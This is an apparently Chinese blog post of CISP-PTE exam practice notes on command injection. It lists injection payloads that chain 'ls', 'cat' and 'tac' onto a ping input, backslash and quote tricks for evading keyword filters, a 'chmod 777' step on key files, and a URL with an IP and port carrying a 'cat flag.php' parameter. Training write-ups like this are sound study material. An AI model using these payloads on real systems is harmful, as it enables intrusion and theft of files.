当前位置:网站首页>2022 CISP-PTE(三)命令执行
2022 CISP-PTE(三)命令执行
2022-07-03 06:13:00 【Aτθ】
一、第一道
1、题目环境
2、拿key
2.1、获取目录
127.0.0.1 | ls
127.0.0.1 | ls ../
2.2、读取文件
常用命令执行函数:
system("ls");
eval、exec
linux读文件: cat、tac、less、more、head、tail
ca\t、ca''t、cat""t
如果对key.php做了过滤:
key.* k{
e}y.php k?y.php
127.0.0.1 | c\at ../key.php
127.0.0.1 | t\ac ../key.php
第二道
1、题目环境
2、解题步骤
2.1 获取目录
2.2 提升权限
127.0.0.1 & l\s -al ../key.*
127.0.0.1 & chmo\d 777 ../key.*
127.0.0.1 & l\s -al ../key.*
2.3 获取key
127.0.0.1 & t\ac ../key.*
三、第三道
1、题目环境
2、解题步骤
第四道
1、题目环境
2、解题步骤
2.1、ls
2.2、获取key
http://81.70.245.6:50289?c=cat flag.php;
边栏推荐
- Clickhouse learning notes (2): execution plan, table creation optimization, syntax optimization rules, query optimization, data consistency
- Jackson: what if there is a lack of property- Jackson: What happens if a property is missing?
- Jedis source code analysis (I): jedis introduction, jedis module source code analysis
- Docker advanced learning (container data volume, MySQL installation, dockerfile)
- Leetcode problem solving summary, constantly updating!
- What's the difference between using the Service Worker Cache API and regular browser cache?
- Kubernetes notes (VI) kubernetes storage
- Scripy learning
- YOLOV1学习笔记
- 项目总结--04
猜你喜欢
使用 Abp.Zero 搭建第三方登录模块(一):原理篇
Reinstalling the system displays "setup is applying system settings" stationary
YOLOV3学习笔记
项目总结--2(Jsoup的基本使用)
Kubernetes notes (IX) kubernetes application encapsulation and expansion
Cesium Click to obtain the longitude and latitude elevation coordinates (3D coordinates) of the model surface
ruoyi接口权限校验
Code generator - single table query crud - generator
表达式的动态解析和计算,Flee用起来真香
从小数据量 MySQL 迁移数据到 TiDB
随机推荐
Jedis source code analysis (I): jedis introduction, jedis module source code analysis
Openresty best practices
In depth learning
Redis cluster creation, capacity expansion and capacity reduction
IE browser flash back, automatically open edge browser
Pytorch builds the simplest version of neural network
Docker advanced learning (container data volume, MySQL installation, dockerfile)
The win7 computer can't start. Turn the CPU fan and stop it
Interesting research on mouse pointer interaction
Oauth2.0 - using JWT to replace token and JWT content enhancement
Project summary --2 (basic use of jsup)
Kubernetes notes (IX) kubernetes application encapsulation and expansion
有意思的鼠标指针交互探究
Apifix installation
Kubernetes notes (VI) kubernetes storage
Convolution operation in convolution neural network CNN
致即将毕业大学生的一封信
Cesium 点击获三维坐标(经纬度高程)
剖析虚幻渲染体系(16)- 图形驱动的秘密
从 Amazon Aurora 迁移数据到 TiDB